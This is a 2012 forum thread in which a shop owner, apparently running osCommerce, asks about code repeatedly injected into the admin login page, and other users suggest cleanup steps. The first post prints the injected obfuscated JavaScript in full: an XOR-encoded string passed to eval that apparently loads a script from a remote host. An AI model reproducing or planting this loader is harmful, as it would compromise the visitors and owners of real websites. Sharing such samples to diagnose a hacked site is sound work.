sactown Posted January 14, 2012 Posted January 14, 2012 I am running 2.2rc2, but I have been keeping it update with bug updated and patches, like the ones pinned to this forum and update guides. Here is the code I keep getting weekly injected back in to my admin login.php file. Any one else getting this also? The files date does not get modified. This seems like the only file effected. <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="SetFocus();"><ad><script type='text/javascript'>this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this.u=false;this.o="jP";this.j=false;this.k="gZ";this.s=false;d="";for(a=0;a<c["le"+unescape("%6e%67%74%68")];a++){this.H= this.h="";this.P=43510;this.r=this.z="";this.v=37015;this.F="qY";this.L=62857;this.g="eS";e=c["char"+unescape("%43%6f%64%65%41%74")](a);this.D=false;e^=232;this.q=36524;d+=h(e);this.R=this.p=""}this.f="dX";this.a="";g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})("9e899ac889d59f81868c879fc686899e818f899c879ac69d9b8d9aa98f8d869cc48ad5c7c09189808787949b8d899a8b8094859b868a879c949189868c8d90948f87878f848d8a879c948a81868f94899b83c1c781c48bd586899e818f899c879ac6899898be8d9a9b818786d3c8818ec08c878b9d858d869cc68b878783818dc681868c8d90a78ec0ca808784918b878783818dcac1d5d5c5d9cecec989c69c87a4879f8d9aab899b8dc0c1c685899c8b80c08ac1cece8bc69c87a4879f8d9aab899b8dc0c1c681868c8d90a78ec0ca9f8186cac1c9d5c5d9c1939e899ac88cd5b3ca8591898c9bc68689858dcac4ca898c9b868d9cc68a8192cac4ca9c8787848a899a8b8785c6879a8fcac4ca85918a899ac69d9bcac4ca8e9a8d8d898cc68689858dcab5c48dd5b3ca89908dc6cac4ca8a8790c6cac4ca8b8790c6cac4ca8c8d90c6cac4ca8e8990c6cac4ca8e8190c6cac4ca8e8790c6cac4ca8f8790c6cac4ca808d90c6cac4ca838d90c6cac4ca848990c6cac4ca848d90c6cac4ca848790c6cac4ca849d90c6cac4ca858990c6cac4ca858190c6cac4ca868190c6cac4ca879087c6cac4ca879091c6cac4ca988990c6cac4ca988190c6cac4ca988790c6cac4ca989190c6cac4ca9a8990c6cac4ca9a8d90c6cac4ca9b8990c6cac4ca9b8d90c6cac4ca9b8190c6cac4ca9b8790c6cac4ca9c8990c6cac4ca9c9d90c6cac4ca9e8d90c6cac4ca9e8790c6cac4ca9f8990c6cac4ca90819bc6cac4ca928990c6cab5c48ed5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28cc6848d868f9c80c1c48fd5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28dc6848d868f9c80c1d38c9cd5868d9fc8ac899c8dd38c9cc69b8d9cbc81858dc08c9cc68f8d9cbc81858dc0c1c3d1d8dfdaaddcc1d38c878b9d858d869cc68b878783818dd5ca808784918b878783818dd5cac38d9b8b89988dc0ca808784918b878783818dcac1c3cad38d9098819a8d9bd5cac38c9cc69c87afa5bcbb9c9a81868fc0c1c3cad398899c80d5c7cad3c88c878b9d858d869cc69f9a819c8dc0cfd49b8b9a81989cc89c91988dd5ca9c8d909cc782899e899b8b9a81989ccac89b9a8bd5ca809c9c98d2c7c7cfc38db38fb5c38cb38eb5c3cfc79b919b9c8d85c78b89989c818786c6829bcad6d4b4c79b8b9a81989cd6cfc195d3"); this.n=3279;this.O=58441;</script></ad><b1><!--f9mYZ4E7eNrTT07MycksKdfPSMxNSczL1M/JT8/M0yvIKLC1tTU0MjMyszAzNTUGABfJDKI=--></b1> <!-- header //--> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //-->
Guest Posted January 14, 2012 Posted January 14, 2012 Moses, If you have patched your site and are still getting hacked, it is because the hacker has: 1) Added a backdoor to your server to access it anytime. 2) Your FTP password to access your server anytime. Chris
♥geoffreywalton Posted January 14, 2012 Posted January 14, 2012 Have a look at the ftp access logs and site logs at the time the file is updated. Maybe you can see something suspicious HTH G Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>.
sactown Posted January 14, 2012 Author Posted January 14, 2012 I use Godaddy Hosting. I will try to email their support for the ftp logs. Not sure if I have to pay for other site stats, but I will look into it. I also scanned my computers for adware/malware/viruses with a couple of different progams just to make sure it is not my computers, and I got nothing.
sactown Posted January 14, 2012 Author Posted January 14, 2012 I was able to get the apache traffic logs. Will go through them and see what I can find out.
Guest Posted January 14, 2012 Posted January 14, 2012 It does sound like they've gotten in through a security flaw on the server or gained access through FTP or maybe even the hosting control panel. IF you haven't done the following already.... 1. Contact your hosting immediately about the problem, if you can't access the logs, they sure can. 2. Change your FTP password. 3. Add/modify the HTAccess file in the admin folder to limit access by password or ipaddress. At least then it will stop rougue bots scouring the admin folder. 4. Remove the File_Manager.php file from your admin folder. This has been a well documented issue.
♥geoffreywalton Posted January 14, 2012 Posted January 14, 2012 filemanager was only an issue because of the login work around. If the site is secure, file manager is fine to be on the sever. Personally I remove it because I always edit locally on a copy. Cheers G Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.